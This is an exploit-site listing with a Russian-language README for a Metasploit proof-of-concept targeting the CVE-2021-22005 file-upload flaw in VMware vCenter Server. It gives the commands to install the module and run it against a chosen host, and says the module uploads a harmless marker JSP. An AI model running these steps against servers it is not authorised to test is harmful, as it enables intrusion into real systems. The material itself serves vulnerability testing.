Sploitus

Exploit for CVE-2021-22005

kitploit · 2026-08-25

Exploit Code

MARKDOWN32 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TIAGOB0B-CVE-2021-22005
# CVE-2021-22005-metasploit

metasploit-скрипт (POC/EXP) для CVE-2021-22005: VMware vCenter Server содержит уязвимость произвольной загрузки файлов

# подготовка POC

root@kitploit:~
    
    
    git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
    cd CVE-2021-22005-metasploit
    mkdir -p ~/.msf4/modules/auxiliary/scanner/http
    cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
    chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
    msfconsole
    

# использование POC

root@kitploit:~
    
    
    set rhost <vuln ip/host>
    set port <vuln port>
    set ssl <default: true for https>
    exploit
    

# результат

скрипт загружает безвредный jsp, который содержит текст "Could be vuln by CVE-2021-22005", закодированный в base64 ![poc](https://assets.kitploit.com/production/public/readmes/33522/6b5a18bba5660763dfb94b0f3407f0a557ed58193f7fa2a50d9d4b619b811fc0.png)